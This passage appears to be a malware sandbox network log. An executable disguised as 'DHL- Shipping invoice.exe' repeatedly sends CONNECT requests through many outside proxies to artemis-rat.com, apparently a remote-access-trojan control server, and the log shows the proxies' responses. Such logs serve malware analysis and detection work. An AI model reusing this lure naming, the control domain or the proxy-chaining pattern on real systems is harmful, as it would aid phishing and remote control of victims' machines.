                            1337192.168.2.453912222.220.102.15980006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.936808109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1338192.168.2.453954211.222.252.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.938183069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1339192.168.2.452194109.248.235.4648906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.938375950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1340192.168.2.453956138.201.21.227400976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.938416004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.177067041 CET24INHTTP/1.1 403 #string


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1341192.168.2.453948153.99.63.14380006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.940680027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1342192.168.2.45395327.96.235.171806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.942277908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1343192.168.2.454116104.20.22.93806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.942406893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.029921055 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1344192.168.2.454123172.67.181.129806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.942616940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.029467106 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1345192.168.2.45399146.51.249.13531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.942842960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.226182938 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1346192.168.2.452117212.161.133.200806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.942848921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953378916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.066135883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.062822104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.062304020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.062318087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.079085112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:17.249891043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1347192.168.2.45411392.204.135.37550196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.946201086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1348192.168.2.45395038.10.90.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.946674109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1349192.168.2.453976219.73.88.167806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.947613955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1350192.168.2.454085166.62.121.102458866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.951879025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1351192.168.2.453958103.166.141.74200746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.952292919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1352192.168.2.454084159.65.77.16885856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.952476978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1353192.168.2.454086107.173.146.53156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.953624964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1354192.168.2.453450107.180.88.173365036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.953777075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953388929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.066159010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.062819958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.062403917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.077892065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:41.167423010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1355192.168.2.45412412.186.205.121806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.953948021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.452876091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.844212055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750134945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1356192.168.2.453997103.242.119.88806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.958687067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.280524015 CET629INHTTP/1.1 407 Proxy Authentication Required
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: Apache
                            Proxy-Authenticate: Basic realm="Authorization"
                            Content-Length: 415
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1357192.168.2.45340469.61.200.104361816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.963874102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1358192.168.2.453951175.183.82.22181936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.966394901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1359192.168.2.4540688.217.95.4488996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.966665983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1360192.168.2.45412638.7.18.10280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.966911077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.540843010 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1361192.168.2.454012103.213.97.74806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.968060017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.310194016 CET334INHTTP/1.1 400 Bad Request
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 204
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1362192.168.2.454071198.44.255.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.968646049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1363192.168.2.45410437.187.91.192278986484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.969302893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1364192.168.2.452506173.249.33.122648736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.969458103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1365192.168.2.453440187.252.154.9041536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.969772100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1366192.168.2.453988183.230.162.12290916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.972042084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.344203949 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1367192.168.2.453999223.113.80.15890916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.974004984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.348253965 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Content-Type: text/html
